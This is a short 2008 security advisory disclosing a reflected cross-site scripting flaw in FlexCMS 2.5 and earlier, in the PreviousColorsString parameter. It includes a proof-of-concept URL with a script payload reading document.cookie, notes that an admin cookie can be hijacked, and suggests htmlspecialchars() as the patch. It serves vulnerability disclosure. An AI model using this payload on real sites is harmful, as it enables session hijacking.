FlexCMS "PreviousColorsString" Cross-Site Scripting :: 2008-08-18
---------------------------------------------------------------- Script : FlexCMS <= 2.5 Type : Cross Site Scripting Vulnerability Alert : Low ---------------------------------------------------------------- Download From : http://www.flexcms.com/ ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com ---------------------------------------------------------------- Cross Site Scripting Vulnerability : File Name : inc-core-admin-editor-previouscolorsjs.php Vulnerable Variable : PreviousColorsString Send Method : GET Register_globals : On Dangerous PHP Code (LINE 53) : print 'document.write(\''.$PreviousColorsString.'\');'; Address : http://example/inc-core-admin-editor-previouscolorsjs.php?PreviousColors String=<script>alert(document.cookie)</script> Attacker can hijack admin cookie with this vulnerability .... Solution for patch : filter PreviousColorsString variable with htmlspecialchars() function ... ---------------------------------------------------------------- Tnx : God HTTP://IRCRASH.COM ----------------------------------------------------------------Download